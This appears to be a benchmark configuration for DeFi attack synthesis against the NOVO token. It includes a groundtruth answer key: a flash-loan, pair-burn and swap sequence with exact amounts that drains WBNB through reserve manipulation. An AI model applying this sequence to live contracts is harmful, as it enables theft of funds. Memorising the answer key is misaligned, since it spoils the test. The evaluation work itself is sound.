# Information for benchmarks building.
project_name: "NOVO"

ctrt_name2cls:
  - ["wbnb", "WBNB"]
  - ["novo", "NOVO"]
  - ["pair", "UniswapV2Pair"]
  - ["factory", "UniswapV2Factory"]
  - ["router", "UniswapV2Router"]

ctrt_name2deploy:
  - ["wbnb", ""]
  - ["novo", "new NOVO()"]
  - ["pair", ""]
  - ["factory", ""]
  - ["router", ""]

extra_actions:
  - "function burn_novo_pair(uint256 amount) internal eurus {
      novo.transferFrom(address(pair), address(novo), amount);
      pair.sync();
    }"

extra_deployments:
  - "novo.afterDeploy(address(pair));"
extra_statements: []

attack_goal_str: "wbnb"

groundtruth:
  - ["borrow", "wbnb", "owner", "17e18"]
  - ["swap", "pair", "attacker", "wbnb", "novo", "wbnb.balanceOf(attacker)", "pair.getAmountOut(wbnb.balanceOf(attacker), address(wbnb))"]
  - ["burn", "novo", "pair", "0.113951614e18"]
  - ["swap", "pair", "attacker", "novo", "wbnb", "novo.balanceOf(attacker)", "pair.getAmountOut(novo.balanceOf(attacker), address(novo))"]
  - ["payback", "wbnb", "owner", "17e18 * 1003 / 1000"]

# Information for search space building.
roles:
  "wbnb":
    is_asset: true
    is_erc20: true
    is_stablecoin: true
  "novo":
    is_asset: true
    is_erc20: true
    is_stablecoin: false
    is_burnable: true
  "pair":
    is_swappair: true
    is_uniswap: true
    token_pair: ["novo", "wbnb"]
    support_swaps:
      "wbnb": ["novo", "wbnb"]
      "novo": ["novo", "wbnb"]
    is_oracle: true
    oracle: "pair"
    is_lendpool: true

pattern: "Token Burn"
